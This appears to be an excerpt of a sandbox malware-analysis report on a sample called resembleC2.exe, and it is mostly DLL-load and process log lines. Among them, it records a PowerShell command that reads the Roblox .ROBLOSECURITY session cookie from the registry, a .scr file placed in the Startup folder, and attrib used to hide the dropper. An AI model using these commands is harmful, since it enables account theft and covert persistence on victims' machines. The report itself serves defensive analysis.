                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Users\user\Desktop\resembleC2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                            Source: C:\Users\user\Desktop\resembleC2.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: resembleC2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: resembleC2.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                            Source: MoonHub.exe.0.dr Static PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                            Source: C:\Users\user\Desktop\resembleC2.exe Code function: 0_2_00007FF848E900BD pushad ; iretd 0_2_00007FF848E900C1
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe Code function: 2_2_00007FF848E500BD pushad ; iretd 2_2_00007FF848E500C1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Code function: 5_2_00007FF848EA6F9F push esi; iretd 5_2_00007FF848EA6FA7
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Code function: 5_2_00007FF848E900BD pushad ; iretd 5_2_00007FF848E900C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF848D4D2A5 pushad ; iretd 11_2_00007FF848D4D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF848E600BD pushad ; iretd 11_2_00007FF848E600C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FF848F32316 push 8B485F94h; iretd 11_2_00007FF848F3231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FF848E700BD pushad ; iretd 15_2_00007FF848E700C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FF848E60928 push E958D61Ch; ret 17_2_00007FF848E60909
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FF848E600BD pushad ; iretd 17_2_00007FF848E600C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FF848E608BD push E958D61Ch; ret 17_2_00007FF848E60909
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FF848E86387 push esp; retf 19_2_00007FF848E86388
                            Source: resembleC2.exe Static PE information: section name: .text entropy: 7.96053442320482

                            Persistence and Installation Behavior

                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\MoonHub.exe"
                            Source: C:\Users\user\Desktop\resembleC2.exe File created: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe
                            Source: C:\Users\user\Desktop\resembleC2.exe File created: C:\Users\user\AppData\Local\Temp\MoonHub.exe

                            Boot Survival

                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\gqnbO.scr

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                            Source: C:\Users\user\Desktop\resembleC2.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
